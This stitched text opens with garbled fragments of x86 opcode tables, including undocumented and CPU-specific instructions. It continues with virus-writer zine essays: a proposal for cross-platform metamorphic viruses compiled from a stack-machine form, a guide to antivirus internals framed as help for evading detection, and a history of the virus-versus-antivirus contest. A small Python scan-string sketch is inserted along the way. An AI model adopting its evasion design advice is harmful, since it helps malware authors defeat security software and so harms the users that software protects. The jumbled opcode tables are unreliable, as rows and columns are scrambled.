NEC V20+
CLEAR1 r/m, im8
P6+
-
JA
rel 386+
r/m
SL, P5+
CPUID
CMOVNA r, m
PCMPGTD mm, mm/m64
386+
SETZ
r/m
386+
CMPXCHG r/m, r
xD
NEC V20+
-
MMX
JNZ
rel 386+
CMOVA r, m
MMX
PCMPEQW mm, mm/m64
386+
SETNC
FS
486+ B1+ step
TEST1 r/m, im
P6+
-
PCMPGTW mm, mm/m64
JZ
rel 386+
POP
Bx
-
NEC V20+
ROL4 r8/m8
-
MMX
MMX
386+
SETC
r/m 386+
xC P6+
WBINVD
NEC V20+
TEST1 r/m, im8
P6+
-
PCMPEQB mm, mm/m64
JNC
rel 386+
PUSH
mm, im8 386+
SETNO
r/m
xB
486
NEC V20+
-
MMX
MMX
table 2.24
JC
rel 386+
Ax
mm, im8 386+
SETO
NOT1 r/m, CL -
P6+
MMX
MMX
table 2.23
JNO
rel
9x
INVD
NEC V20+
MOV TRn, r32
P6+
MMX
table 2.22 mm, im8
xA
x9 486 !
…
NEC V20+
NOT1 r8/m8, CL
-
P6+
MMX
386+
x8 !
table 3.9 386, 486
MOV r32, TRn
RDMPC r8, r8
CMOVC r, m
MMX
-
CLTS
NEC V20+
386, 486
PUNPCKLBW PUNPCKLWD PUNPCKLDQ PACKSSWB PCMPGTB mm, mm/m64 mm, mm/m64 mm, mm/m64 mm, mm/m64 mm, mm/m64
7x
LOADALL
NEC V20+
P6+
MMX
x7 286+ table 3.2
alternative
MOV DRn, r32
P6+
CMOVNO r, m
x6 286
SLC, P5+ table 3.11 P6+
RDTSC r8, r8 P6+
x5 286 !
LOADALL
…
386+ table 3.8 386+
SLC, P5+ table 3.10 P5+
x4 286+ !
table 3.3
table 3.7 386+
4x
x3 286+
r/m
1x 2x
x2 286+
BSWAP
SI
DI
MMX
PADDUSW mm, mm/m64
MMX
-
PANDN mm, mm/m64
-
PXOR mm, mm/m64
MMX
PADDSW mm, mm/m64 MMX
PADDW mm, mm/m64
MMX
MMX table 3.15
PADDD mm, mm/m64
…
Table 2 - extended opcodes 00 80 table 2.1
81 table 2.2
82 table 2.3
83 table 2.4
08
000
10
001
18
010
20
011
28
100
8C 8E
A
A
A
A
A
ADC r8/m8, im8
SBB r8/m8, im8
AND r8/m8, im8
SUB r8/m8, im8
XOR r8/m8, im8
CMP r8/m8, im8
A
A
A
A
A
A
A
A
ADD r/m, im
OR r/m, im
ADC r/m, im
SBB r/m, im
AND r/m, im
SUB r/m, im
XOR r/m, im
A!
A!
A!
A!
??? A !
??? A !
386+ A
A
A
ADD r/m, sim8
OR r/m, sim8
MOV r/m, ES
ADC r/m, sim8
MOV r/m, CS
386+ A
A
A
SBB r/m, sim8
AND r/m, sim8
C0
C6 table 2.10
C7 table 2.11
MOV r/m, DS
MOV r/m, FS
MOV r/m, GS 386+
MOV SS, r/m
MOV DS, r/m
MOV FS, r/m
MOV GS, r/m
R!
R!
R!
R!
R!
POP
POP
r/m
ROL r8/m8, im8
POP
r/m
ROR r8/m8, im8
RCL r8/m8, im8
186+
RCR r8/m8, im8
186+
186+
POP
r/m
186+
SHL r8/m8, im8
R!
POP
r/m
186+
-
-
POP
r/m
186+
-
R!
POP
r/m
186+
CMP r/m, sim8
386+
MOV CS, r/m
POP
XOR r/m, sim8
386+
R
r/m
386+ A
A
SUB r/m, sim8
MOV ES, r/m
186+
C1 table 2.9
MOV r/m, SS 8088
186+
table 2.8
CMP r/m, im ??? A !
A!
ADD OR ADC SBB AND SUB XOR CMP r8/m8, sim8 r8/m8, sim8 r8/m8, sim8 r8/m8, sim8 r8/m8, sim8 r8/m8, sim8 r8/m8, sim8 r8/m8, sim8
8F table 2.7
111
A
OR r8/m8, im8
! table 2.6
38
110
A
ADD r8/m8, im8
386+
table 2.5
30
101
A
r/m
186+ !
SHR r8/m8, im8
186+
186+
SAL r8/m8, im8
186+ !
186+
SAR r8/m8, im8
186+
186+
ROL r/m, im8
ROR r/m, im8
RCL r/m, im8
RCR r/m, im8
SHL r/m, im8
SHR r/m, im8
SAL r/m, im8
SAR r/m, im8
R
R!
R!
R!
R!
R!
R!
R!
MOV r8/m8, im8
MOV r8/m8, im8
MOV r8/m8, im8
MOV r8/m8, im8
MOV r8/m8, im8
MOV r8/m8, im8
MOV r8/m8, im8
MOV r8/m8, im8
R
R!
R!
R!
R!
R!
R!
R!
MOV r/m, im
MOV r/m, im
MOV r/m, im
MOV r/m, im
MOV r/m, im
MOV r/m, im
MOV r/m, im
MOV r/m, im
!
D0 table 2.12
ROL r8/m8, 1
ROR r8/m8, 1
RCL r8/m8, 1
RCR r8/m8, 1
SHL r8/m8, 1
SHR r8/m8, 1
SAL r8/m8, 1
SAR r8/m8, 1
!
D1 table 2.13
ROL r/m, 1
ROR r/m, 1
RCL r/m, 1
RCR r/m, 1
SHL r/m, 1
SHR r/m, 1
SAL r/m, 1
SAR r/m, 1
!
D2 table 2.14
ROL r8/m8, CL
ROR r8/m8, CL
RCL r8/m8, CL
RCR r8/m8, CL
SHL r8/m8, CL
SHR r8/m8, CL
SAL r8/m8, CL
SAR r8/m8, CL
!
D3 table 2.15
F6 table 2.16
F7 table 2.17
FE table 2.18
ROL r/m, CL TEST r8/m8, im8
-
TEST r/m, im INC r8/m8
DEC r8/m8
R
R
INC
table 2.21
SAL r/m, CL
SAR r/m, CL
NOT r8/m8
NEG r8/m8
MUL r8/m8
IMUL r8/m8
DIV r8/m8
IDIV r8/m8
NEG
SGDT
-
CALL far m
SIDT
LGDT
r/m
r/m
-
PSRLW mm, im8
table 2.22
-
-
-
-
SMSW
286+ M
-
LMSW
r/m -
PSRAW mm, im8
MMX
-
PSLLW mm, im8
MMX
-
-
PSRAD mm, im8
-
PSRLQ mm, im8
table 2.24
-
PSLLD mm, im8
table 2.25
SVLDT
0F 7B
-
-
PSLLQ mm, im8
-
-
-
-
-
-
-
-
RSLDT
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
m80
0F 7C
486
SVTS m80 486
M
0F 7D table 2.28
-
486
M table 2.27
-
m80 M
table 2.26
MMX
486
M
0F 7A
MMX
MMX
0F 73
486
INVLPG r/m
r/m MMX
-
PSRLD mm, im8
table 2.23
PUSH r/m
286+
VERW
MMX
0F 72
-
286+
LIDT r/m
-
r/m
286+
MMX
0F 71
JMP far m
VERR r/m
r/m
R
286+
LTR r/m 286+ M
IDIV
r/m -
JMP near r/m
286+
LLDT r/m 286+ M
DIV
r/m
M
286+
STR r/m 286+ M
r/m
IMUL
r/m -
CALL near r/m 286+
SLDT
MUL
r/m -
r/m
r/m
0F 01
SHR r/m, CL
NOT
DEC
r/m
M
SHL r/m, CL
M
286+
table 2.20
RCR r/m, CL
r/m R
0F 00
RCL r/m, CL
-
R
FF table 2.19
ROR r/m, CL
RSTS
-
-
-
m80 386+
0F BA
-
-
-
CMPXCHG8B m64
-
-
-
-
table 2.29
BT r/m, im8
386+
BTS r/m, im8
386+
BTR r/m, im8
386+
BTC r/m, im8
P5+
0F C7 table 2.30
USED Symbols:
im, im8 - Immediate number, in current operand size 16/32, or 8 bit
sim, sim8 - Signed immediate number 16/32, 8 bit
r/m - Register or memory, see R/M microcode table
mm - MMX register
r, r8 - Register, see Register microcode table
m, m8 - Memory mode
[adr] - Fixed address location (imm)
rel8 - Relative address (sim8, based from next instruction)
adr - Fixed address (imm)
seg - Segment register
A - AX variant is not used by compilers (shorter form is available too)
! - Undocumented instruction / not used by compilers
R - A shorter form of the instruction exists for a register operand
M - Operand is actually r/m type, but is invalid with R variant
-
-
-
-
Table 3 - CPU-dependent instructions NEC V20+
IBM 486SLC2
INTEL 386
INTEL 486
INTEL P5
INTEL P6
CYRIX 486
CYRIX 5x86
CYRIX 6x86
AMD 386SX/DX
AMD 486
AMD K5
AMD K6
BRKS
ICEBP
-
-
-
-
SMI?
SMI?
SMI?
SMI
SMI
?
?
-
ICERET
LOADALL
LOADALL
-
-
?
?
?
RES3
RES4
?
?
V25/V35
F1 table 3.1
im8
0F 07 table 3.2
0F 10 table 3.3
0F 11 table 3.4
0F 12 table 3.5
0F 13 table 3.6
TEST1 r8/m8, CL
UMOV r/m, r8
?
?
-
-
UMOV r/m, r8
UMOV r/m, r8
UMOV r/m, r8
UMOV r/m, r8
UMOV r/m, r8
?
?
TEST1 r/m, CL
UMOV r/m, r
?
?
-
-
UMOV r/m, r
UMOV r/m, r
UMOV r/m, r
UMOV r/m, r
UMOV r/m, r
?
?
CLEAR1 r8/m8, CL
UMOV r8, r/m
?
?
-
-
UMOV r8, r/m
UMOV r8, r/m
UMOV r8, r/m
UMOV r8, r/m
UMOV r8, r/m
?
?
CLEAR1 r/m, CL
UMOV r, r/m
?
?
-
-
UMOV r, r/m
UMOV r, r/m
UMOV r, r/m
UMOV r, r/m
UMOV r, r/m
?
?
0F 20
ADD4S
MOV r32, CRn
MOV r32, CRn
MOV r32, CRn
MOV r32, CRn
MOV r32, CRn
MOV r32, CRn
MOV r32, CRn
MOV r32, CRn
MOV r32, CRn
MOV r32, CRn
MOV r32, CRn
MOV r32, CRn
SUB4S
MOV CRn, r32
MOV CRn, r32
MOV CRn, r32
MOV CRn, r32
MOV CRn, r32
MOV CRn, r32
MOV CRn, r32
MOV CRn, r32
MOV CRn, r32
MOV CRn, r32
MOV CRn, r32
MOV CRn, r32
MOV TRn, r32
MOV TRn, r32
MOV TRn, r32
MOV TRn, r32
MOV TRn, r32
MOV TRn, r32
MOV TRn, r32
MOV TRn, r32
?
RDTSC r8, r8
?
table 3.7
0F 22 table 3.8
0F 28 table 3.9
0F 31 table 3.10
0F 33 table 3.11
ROL4 r8/m8 INS r8, r8
-
-
-
EXT r8, r8
-
-
-
-
-
RDTSC r8, r8
RDTSC r8, r8
-
RDMPC MMX
0F 33
-
SMINT
-
-
table 3.12
0F A6
table 3.15
-
-
-
-
-
-
-
-
-
-
SMINT
-
-
-
-
-
-
MMX
MOVD r/m32, mm
MOVD r/m32, mm
MMX
MOVD r/m32, mm
CMPXCHG r/m, r8
XBTS CMPXCHG r, r/m, EAX, r/m, CL r8
CMPXCHG r/m, r8
CMPXCHG r/m, r8
CMPXCHG r/m, r8
CMPXCHG r/m, r8
CMPXCHG r/m, r8
XBTS CMPXCHG r, r/m, EAX, r/m, CL r8
CMPXCHG r/m, r8
CMPXCHG r/m, r8
-
CMPXCHG r/m, r
IBTS CMPXCHG r, r/m, EAX, r/m, CL r
CMPXCHG r/m, r
CMPXCHG r/m, r
CMPXCHG r/m, r
CMPXCHG r/m, r
CMPXCHG r/m, r
IBTS CMPXCHG r, r/m, EAX, r/m, CL r
CMPXCHG r/m, r
CMPXCHG r/m, r
table 3.14
0F FF
-
-
table 3.13
0F A7
?
BRKEM im8
-
-
-
USED Symbols:
im, im8 - Immediate number, in current operand size 16/32, or 8 bit
sim, sim8 - Signed immediate number 16/32, 8 bit
r/m - Register or memory, see R/M microcode table
r, r8 - Register, see Register microcode table
m, m8 - Memory mode
[adr] - Fixed address location (imm)
rel8 - Relative address (sim8, based from next instruction)
adr - Fixed address (imm)
seg - Segment register
-
-
-
-
OIO
-
-
UD
UD?
Introduction If we can handle such a complexe target as PE files are we are facing the sad fact we can infect files on the Intel platform but we can never get outside this platform. Rare exception from this axiom is virus Esperanto (by Mr. Sandman published in 29A Nr. 2) which is the first of its kind, capable of speading on various platforms and processors. Glory goes to Mr. Sandman but unfortunately, this approach cannot be used for larger projects. Whole Esperanto's solution is based on presence of two parts - one for intel processors, the other for Macs, practically doubling the size of necessary code. It doesn't seem to be the ideal solution, let's image the 50 kB viral code for three processors and we well land somewhere around 150 kb maxivirus.
Idea I would solve this problem using another approach. My approach would be more difficult (but not impossible) to code. I state here i am not ready to participate on such a project (no time and morale left). I would like to find some newbies or people ready to work hard. Idea is quite simple - we should carry the body in some kind of pre-compiled state, which should be easy translated to assembly language of every single target processor. Imagine, we have C compilator, which produces output at the level between C and assembly languages. Between C and assembly means, that before code is assembled it has to be compiled by special C compiler. In fact code should be at the lowest level, it could be, because we need to assemble it for various architectures. Because of this code should be register and memory addressing mode independent. The one model i like the best is stack machine (uses RPL - reverse polish logic) with direct memory adressing mode (only value on top of the stack is a memory address). Of course, this means compiled "code" will be larger than regular intel code. Resulting code for some processor could gain quite high variability this way (by every single translation could be another instructions or registers used). Also in the case resulting code will be close enough to code produced by C compilers - some standart stack frame, analogical using of stack, registers, variables and so on - this would be very hard to differenciate by heuristics without any further analysis. And it will be even harder (if not impossible) to distinguish between variants. This would make problem of use complicated (and unemulationable) polymorphic routines, decryptors and such a things redundant. The only one condition to be not a simple target is to have the "source" (which is by its nature more or less static) encoded and decode it only if need to replicate. Of course, precompiled "source code" has to contain "assembler" for all supported processors. 
Assembler as a heart of body - gives a virus it's variability and complexness, so detection is as hard as good is assembler. That's reason why virii can be very long. It will be not enough just 5kB like for a classic poly routines. That is reason why (probably) wouldn't be such a viruses spreaded by mailing. But besides of this code will be very similar to standart languages. You needn't to deal with infecting file in general, you can link your data area wherever you need so you need not to use writeable sections for code - what is in my opinion the strongest heuristic flag.
Real time compiling Anoter posibility is compile code at run-time - you needn't to have whole code compiled in host file. You can compile it at time you need it. This may at least reduce a size the file is increased of. I am not sure if this is safe enough in order not to be visible but i think compilation is complex enough to slow emulation down, and may be makes scanning-speed unacceptable, so avers will have to find out new ways of detecting.
Code morphing Another advantage is the BIG possibility of some modifications to the pre-compiled code. Because you exactly know what your code means and what kind of modifications can be performed on it. Because new one inherits it's code by parent, in 10 generations there can be a very big difference between existing variants. Just imagine block permutations (modules or just functions) and minor changes in code like c=a+b > c=b+a. I think it is good enough to totaly change the look of virii from parent to child and not speaking even about differences between distant variants. And there are possible a bit more complex changes - of course it depends on source language and you.
Disadvantages - size As i see it, main disadvantage is size. Because of a bit difficult technologies necessary to implement i don't even hope that resulting code will be smaller than 50kB, what is imho a bit problem in these days. At first you can't use mailing strategy to spread itself. It tooks some time to download 150kB of mails :-(. I heard that 300kB is nothing, and there are really coming medias with 100MBs throughput, but main limiting factor is floppy disk/internet and we still live in world, where 3kB/s is a high speed (33k6 modems are quite usual for use of internet from home). There can be some problems on the interference level (level, where host file and virus are directly connected). We are not far enough to say it can be whole handled by compiler or in needs special handling with PE+platform dependend code. But it should not be a big problem.
And now some sci-fi: Probably the first reason we start with all this stuff was to try how will genetics work in vx. And this gives you much better control over code modularision and generation of code. Our first idea was to create virii able to exchange modules with other one in order to optimize itself and adapt to current environment. This gives you much better probability to survive, but need to create environment with strong exchange of genes - what is difficult. And now to real world ...
Closing And now some closing words. Main advantage of the pre-compiled code is possibility to cross-plastform infection. Besides this this approach opens another horizonts at least at the level of today poly engines and in the eternal 'game of hiding body' goes more to the direction of giving the virus body 'right color' than building 'bullet-proof' walls of anti code. This leads in no way to the lower variability of the code. Having this features this concept leads to the viruses which are TMC-like. Another plus is the programming in HLL is more comfortable and faster, read more effective, not speaking of the base address independency :-). Think about it !
One can give the simplest answer: "Know your enemy!". However, it is not so simple. Well, I have taken control of one of our big tours aimed at antiviruses, so I have to answer. Who else can? How can you write a virus without understanding antiviruses? Only with very poor efficiency. The bad but common attribute of virus writers is that they do not know how antiviruses work. Most writers call themselves researchers, but in many cases they are not researching anything, just writing viruses similar one to another. Think a bit - this simplifies the work of the antivirus guys. They need no additional effort to cover new viruses. It is, in other words, schematic. New viruses can be covered within minutes (or even seconds, depending on how wise they are and on the tools they wrote to do so). Of course it depends on when they get to it, and it may take them days or even month(s) if they are overloaded with new samples. But it takes no extra work to catch all the samples in the In-the-Wild set and get Virus Bulletin's 100% award. And I think you will not be happy to be caught so easily.
This tour is meant to explain how antiviruses work: it lists the basic principles and theory of scanning (and cleaning) methods, and partially points out how some of the best antiviruses work (with some of our comments on their hit rates). We will also try to include some valid tests we made on real samples to illustrate the theory. We are not going to tell you exact methods for fooling each antivirus, but to show you the way you must think and how to keep finding newer methods. If we listed, say, ten methods and all of them got used, there would be no method left. Of course, we will try to show some basic directions, but you have to think! Writing viruses is not for lamers. Not any more. Only the best can survive. Think as if it were YOU, for a while.
Virus is as good as long it can survive. Some virus writers are writing their work for "research reasons" just putting it into some collections, spreading between avers, but no more. Well, one may guess it is ethical. At first I have to say - the most unethical thing associated with viruses is destruction. Never do that. You don't have any reasons to do so. The else what left - is the virii principle itself - to spread and be spreaded. There is nothing inbetween. I can illustrate it on Uruguay virus family. Don't you know 'em? They are pretty known: originally, whole family (as far as I know the latest is number 11) was written as some research virus to illustrate technologies. Polymorphic technologies, of course. Their author, named Brueiurere didn't (as far as it is known) supposed them for real spreading - only for avers and to complicate their life a bit. Samples were available for avresearchers, later on only for some selected avers - they obtain samples with important note not to spread them. As the avers a biggest virus-exchangers in the world soon most of them has those samples. Someone of them even put uruguay#6 into real enviroment and this virus (only avers had it!) was detected in the wild. This is classical example that also avers can spread viruses - even if they are saying they are a good guys. But world is never black and white. Later on, uruguay's author was producing some newer versions: up version #8 almost every aver have. Version #10 and #11 were given only to two peoples in the world Ilja Gulfakov (dr.web) and xaefer (avp?). Are uruguays ethical? I don't think so - they are same viruses as other ones, but it complicates life to avers and they don't want to spread them as they can hardly detect them. I return back to the original idea - how long virus can survive. Sooner or later any virus can be detected (and removed as well) unless we can change the current virii principle - but it is a another long discussion. For
avers easily detectable virus that fits to their scanning schemes makes no problem to detect and remove if it appears in the wild. It only depends on how soon the unknown virus (up to that time) infects someone's computer who can find out there is a virus and can see some changes and send sample to some av company. The usual way (just think) is to put it to some directory to analyze it. It depends how much people familiar with viruses they have to process all the samples they have. As many times there is a lot of rubbish in such incoming files, damaged files, and viruses of course. Some minutes, hours or days later virus is roughly checked (usualy not analyzed as complex analyzis tooks lots of time) and a scan-string (or whatever they use) is selected. If it is as easy as mentioned, it doesn't take lots of time. The more it is complicated the more work it takes. If it takes so much work, or they do not understand it at first look, one puts it into some group for later processing (if they will have some free time but they usualy have not if there is too many new viruses). If it is more important - for example it was reported in the wild, or customer have this virus, it must be processed immediately (or sooner, let's say). I will show another example here - well known Slovak virus One_Half (it has several variants, but forget about them for now): it appears in Slovakia and local anti-viruses had to fight him, even as it was a bit complicated (the better is to say non-standard) to detect it. But there were no need for big foreign companies (like Dr.Solomon's Toolkit) to add this virus to scanning as it was non-standard - it was not so easy to add it, so they don't. Even dr.solomon was sold in Slovakia, but it wasn't able to detect One_Half for a months (only some selected samples that were in virus collections, but no others ;-). 
When this virus gets out of Slovakia and infects other countries, it becomes a problem for av companies and they have to solve it - if it is standard or not - customers are requesting it. It takes up to weeks or months for some to do so (also because One_Half appears in In-the-Wild test set of VB). This ignorancy helps One_Half to spread a lot until they were able to detect it successfuly. Was One_Half so amazing and great? In fact, it wasn't. It has only two unusual things that made him famouse - the rest of it is rather simple and uninteresing. The first one (more important for detection) is something what I call distributed decryptor. It is rather easy but it beats the principle of scanners - that's why it was too hard for them to detect: decryptor consist of 10 instructions (all fixed) but they are not at the same place (or chunk). Each instruction surrounded with couple of rubbish instructions (choosed from 10 one-byte instructions like clc, stc, sti, and some other simplest ones) with jump is placed at random place in host file. Jumps connects them in order to keep execution loop. Very simple, isn't it? One can very easily detect this virus. But avers weren't able to. As it doesn't fit their scanning schemes - they weren't able to detect it without writing special aditional routines. And they are busy and lazy, of course (as everyone is). Another unusual thing in One_Half was slow encryption of disc. Each time you reboot, it encrypts two tracks of hard-disc starting from the end (don't think about some strong encryption! it is simplest xor with constant word value) but as long as you have virus you can't notice anything because it (same as if you have a stealth) on fly encrypts-decrypts data in encrypted area. But if one remove the virus, there is no more on-fly decrypting and part of disk is left encrypted (xored, in other words) and user can't access files, etc. 
This was also untraditional and simple removing leads to reinstaling of disk - and avers have to prepare special routines that decrypts disk as well (some of them doesn't even up to now, but One_Half is over in these days). But this is not what I want to appoint, as it indirectly leads to destruction. What you should take from this story? No matter how your virus is complicated or bombastic, it is only valuable if it can complicate life to avers. Thats it.
flush
Fasten your seatbelts and prepare for a long adventure through virus history. I will list the basic principles of the war between viruses and antiviruses to show you how the story went. Most probably I will not be able to keep it in chronological order, but I will try to use a logical order to show the main technologies and counteractions on both sides.
The story begins a long, long time ago (sounds like a fairy tale, doesn't it?) when the first viruses were written. It doesn't matter which one exactly it was; more important is that some of them appeared on users' computers. At that time this war began, and it continues and grows to this day.
The Beginning No matter how big an invention the first self-replicating algorithms were, viruses were not the first programs able to replicate. It started with worms and other hard-to-classify pieces of code some time before viruses. But viruses made the change: ordinary people with computers became infected. The very first viruses all followed one of two basic schemes, file viruses and boot viruses, and some of them survive to this day. Old boot viruses are quite simple: they spread in the boot sector of floppy discs, and on booting from such a floppy the virus copies itself into the partition table and becomes resident (useful if there is no hard disc in the computer). Once resident, it infects the boot sectors of all floppies being written. That's all folks, and it all fits into one sector. Michelangelo and Stoned belong to this class. File viruses like Jerusalem use simple appending parasitic infection and infect com or exe files (or both). When an infected file is executed, the virus usually becomes memory resident and infects every file executed from then on. Some of them do not even have a double-infection check (like Jerusalem), so frequently run programs can grow quite long. I think you all know the basic principles, so I'm not going to explain such trivial things. At that time the situation was quite easy. Maybe some of you have seen, for example, scan19 - yes, it detects 19 viruses! There were really few viruses at that time. How to deal with trivial viruses? Well, the first antiviruses were really stupid and slow. Any program is a unique sequence of instructions - that is something every programmer understands. But what can one (an aver) do if he (usually) doesn't understand file structures? The result was simple algorithms very similar to searching for text in a text editor - the whole(!) file is checked for a specified string. This is the origin of the name "scan-string": a fixed sequence of bytes chosen from the virus body. Moreover, some of the first antiviruses scanned a file as many times as they had strings.
One may guess it is quite inefficient and slow. Sure! But at that time disks were really small (and computers slow as well). I can say this technology was the biggest invention ever in the fight against viruses. It survives to this day in modified forms, as viruses still use fixed code (plain, encrypted or whatever) and can easily be identified this way. Antiviruses are business. A big business, if one has a look at NAI. The beginnings were quite different, as many independent (free) antiviruses were available just to help people. But one can't stand the competition of big money - look at Microsoft to see why. Today, to keep track of the large number of new viruses, many people have to work on an antivirus full-time, and everyone needs money. And people have to buy (or support) antiviruses because they are afraid of viruses. Many people around the world think that viruses have to destroy something - that's why they don't like viruses. But no one cares that Windows crashes have caused much more destruction than viruses. Because that is normal. Weird, isn't it? Well, this fear of viruses started with the biggest computer virus hoax ever, initiated by McAfee - in order to make money, of course.
It was Michelangelo a couple of years ago; maybe some of you remember it. McAfee warned of an upcoming big computer disaster caused by the extremely dangerous virus Michelangelo. They estimated 20 million destroyed computers on the activation date. 20 million was too big a number even then, as there weren't as many computers around the world as today. The hoax passed from publisher to publisher and grew bigger and bigger, and news of this computer apocalypse appeared in many countries. I remember the dad of a schoolfellow of mine forbade him to turn on his computer (a Sinclair ZX Spectrum with an 8-bit Z80 cpu!) because a virus could come into it through the network (the 220V power network!) and destroy it. Wow! Unbelievable, isn't it? Even more so because repairing a disc destroyed by Michelangelo takes a few seconds with diskedit. But no one mentioned that in the hoax, of course. Once the activation day passed, everyone understood, I hope, that far too few computers were destroyed (compared to 20M), but the hoax succeeded: people became really afraid of viruses, and antiviruses are sold worldwide - they became a big business.
Old techniques of scanning (scan-strings) I already mentioned the first scanning methods, based on scan-strings (sequences of bytes selected from the virus body). If one is found in a file, the file is marked as infected. Some of the first antiviruses scanned the whole file for such a string, but later they scanned only specific areas usually used by viruses: the beginning of the file, the end of the file, and/or the area around an exe's entry point or a com's first jump target. Usually approximately 6kB were (or are) scanned - little enough to load quickly and quite enough for most viruses, since at least part of the body should be there. Scan-strings are checked at every position in the loaded buffer, and scanning runs at an acceptable speed. Here I should put a little discussion about scan-strings and how to choose them; I will mention other forms of scan-strings later on. Choosing a scan-string is not as trivial as one may guess. First, the string has to be in the loaded buffer in every case. A scan-string should be as short as possible (to save space and scanning time), but at the same time as long as possible (to detect only this virus, with no false positives). The sequence should be typical for the virus (preferably for this virus only) and should not be found in any regular file. If it is, we call it a false positive identification. It is rather difficult to have no false positives with many short strings, as there are many programs and one simply can't have them all. An example of a really bad scan-string is E800005x: it is short and really typical for viruses. I assume you all know the basic opcodes by heart, but I'll translate it anyway: call $+3, pop xx. But it can be found in nearly any virus, and in many regular programs written in assembler. Hope you got the point. Another question is whether a string should identify several viruses at once, or one and only one. If it identifies, for example, a huge part of the Jerusalem family, the advantage is that it may also identify new mutations.
But such identification is not suitable for cleaning, as the variants partially differ from version to version. Today's trend is to have identification as exact as possible. But even today it is not fully possible. This leads to another extreme, typical for Dr.Solomon's Toolkit: identifying versions even where there are none. An example: take a virus named Z (pure fiction). In reality there is only one version, but in an aver's collection it is split into Z.A and Z.B, and solomon identifies them as two versions while most others do not. But if you take a Z.B infected file and replicate it, the result is caught by solomon as Z.A. What's going on? Well, they selected a scan-string that also covers part of the host file. Usually no one notices, as avers in many cases do not replicate files and only some selected samples travel round the world - so they may get a 100% hit rate on some virus, but only in the virus collections avers have and not in real life. Remember this: they (usually) have only a few samples, and they are not active (not executed). The Tremor story later on tells you why.
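To make the scanner side of this discussion concrete, here is a minimal sketch of a plain scan-string search restricted to the areas mentioned above (file start, file end, around the entry point). Everything in it is an assumption for illustration only: the names candidate_regions and scan, the 6 kB window, and the made-up signature bytes, which belong to no real virus. It is not how any particular antivirus does it.

```python
from typing import Dict, List, Tuple

WINDOW = 6 * 1024  # assumed window size, roughly the 6kB mentioned in the text


def candidate_regions(size: int, entry_point: int,
                      window: int = WINDOW) -> List[Tuple[int, int]]:
    """Return (start, end) byte ranges to scan: file start, file end,
    and a window centred on the entry point."""
    half = window // 2
    return [
        (0, min(size, window)),
        (max(0, size - window), size),
        (max(0, entry_point - half), min(size, entry_point + half)),
    ]


def scan(data: bytes, entry_point: int,
         signatures: Dict[str, bytes]) -> List[Tuple[str, int]]:
    """Search every candidate region for every fixed scan-string.
    Returns sorted (name, absolute offset) pairs without duplicates."""
    hits = set()
    for start, end in candidate_regions(len(data), entry_point):
        chunk = data[start:end]
        for name, sig in signatures.items():
            pos = chunk.find(sig)
            while pos != -1:
                hits.add((name, start + pos))
                pos = chunk.find(sig, pos + 1)
    return sorted(hits)


if __name__ == "__main__":
    # Hypothetical signature table; the bytes are invented for the demo.
    table = {"Demo.A": b"DEMO-SIGNATURE!!"}
    sample = b"\x90" * 10000 + b"DEMO-SIGNATURE!!" + b"\x00" * 100
    print(scan(sample, 0, table))
```

The sketch also shows the trade-off described above: a string sitting in the middle of a large file, far from the entry point, is simply never looked at, which is the price paid for not reading the whole file.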
Early battles - fooling simple scanners Situation stabilizies: there were some viruses, but avers weren't able to beat them completly. Moreover, once it is bussines, they don't want to win this battle totaly as there will be no war anymore and no bussines anymore. Think with me: scanners were available and finding viruses at suitable rate. Of course there are still peoples not using updated scanners all the time so viruses can survive, but new viruses once they are found are added to scanners and can be easily identified. Too bad for virus-writer spending days or weeks to
create nice piece of code to be breaked in a minutes. You have to invent something. There were two answers - stealth and encryption.
Stealth counter-attack Now let's think how scanners works in that time: scanner runned on computer infected with virus opens each file and checks it for some id string. How you can hide? You can become "invisible" once you have total control over computer (elementary under DOS) and hide files beeing scanned. This is called stealth (due to U.S. Bombers B-2 called "Steath" - invisible for radars) and we may talk about two implementations for files: disinfection on-fly (each opened file is disinfected and again infected on closing) and true stealth (all file operations are checked and modified). And for boot viruses a sector redirecting is used. Computer is infected with stealth virus. Virus is active in memory, user runs his favorite scanner and it is searching for strings in files - but as it opens files with viruses, it can't find anything as virus hides itself. Nice, isn't it?
Memory scanning Imagine you are an aver (you have to think for both sides, otherwise you can't rule this war) - what would you do with stealth viruses? The simplest answer is to scan memory as well and, if a virus is found, ask the user to boot from a clean floppy and run the scanner that way - then there is no virus in memory and all is as before with regular viruses. Easy, easy. Memory scanning in the old times was similar to file scanning. All memory is checked for the same strings as files; if one is found, a virus is reported in memory. To speed things up, some antiviruses don't scan the whole memory but only possible locations - they may skip ROMs, the antivirus itself, etc. But it differs from one implementation to another. Memory scanning is not a big technical miracle. Once a virus was found, some antiviruses were able to patch it to be inactive and continue without the need to boot from a clean floppy. But with the many viruses that appeared later this is not usual today, as you can't write such routines for every one of them. AVP, for example, still does this, but only for a few of the most common viruses. However, it is quite useful for lazy users. Inactivating can be done easily by replacing the virus handlers with a jump to the original entry point of the hooked interrupt. Usually the virus body is also erased (except for the jumps of the hooked interrupts, in order to keep the interrupt chain functional) so that the virus is not reported again. Of course this must be done with interrupts disabled (cli) to protect against asynchronous breakdowns. Another idea for partially inactivating a virus in memory, presented by some antiviruses, is the known-entry-point method. There are two basic interrupts under DOS: int 21h for files and int 13h for sectors (boot viruses). If you know the original entry point (you know this version of DOS, or you stored the entry point during installation), you can find out whether some virus is in memory and you can access the functions without the virus' influence.
Of course, for int 13h you must check not the real interrupt pointer, as it points to DOS, but the internal pointer in DOS that points to ROM, as boot viruses are loaded (and hook int13) before DOS does. But this technology in general has many weak points and is forgotten today, as even legitimate programs may redirect those interrupts because Microsoft designed its "OS" this way. Caches, networks, etc. redirect these interrupts, for example. Novell netware, for example, redirects int21 instead of using MS's recommended network redirector facility for its network implementation (because it is implemented in versions 4+). If you call the int21 entry point directly you can't scan Novell's disks. This technology caused many crashes and is unusable in the generic case; see my other article on this, why not to use direct disk access, which deals with these things.
Encryption Once stealth viruses could be found in memory, the next attempts came with encryption experiments. It started with the first encrypted viruses, which had the main virus body encrypted, but there had to be at least a short decryption routine. And this routine is still a fixed sequence of bytes - so it can be identified with a scan-string. One may guess there is no improvement. Actually, not a big one, but it started development in this direction.
